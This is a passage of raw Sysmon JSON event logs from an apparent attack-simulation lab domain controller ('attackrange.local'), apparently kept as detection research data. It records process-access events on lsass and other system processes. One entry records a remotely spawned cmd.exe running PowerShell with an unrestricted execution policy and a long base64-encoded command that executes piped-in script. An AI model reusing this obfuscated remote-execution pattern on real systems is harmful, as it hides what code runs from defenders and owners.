l.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4795,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4796,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.778\r\nProcessGuid: {A837DB8D-0323-5F25-0000-0010CA980700}\r\nProcessId: 1260\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0323-5F25-0000-0010D2950700}\r\nParentProcessId: 672\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.778","ProcessGuid":"{A837DB8D-0323-5F25-0000-0010CA980700}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0323-5F25-0000-0010D2950700}","ParentProcessId":"672","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4797,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-0010D2950700}\r\nSourceProcessId: 672\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-0010CA980700}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-0010D2950700}","SourceProcessId":"672","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-0010CA980700}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4798,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4799,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-0010CA980700}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.765","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-0010CA980700}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4800,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 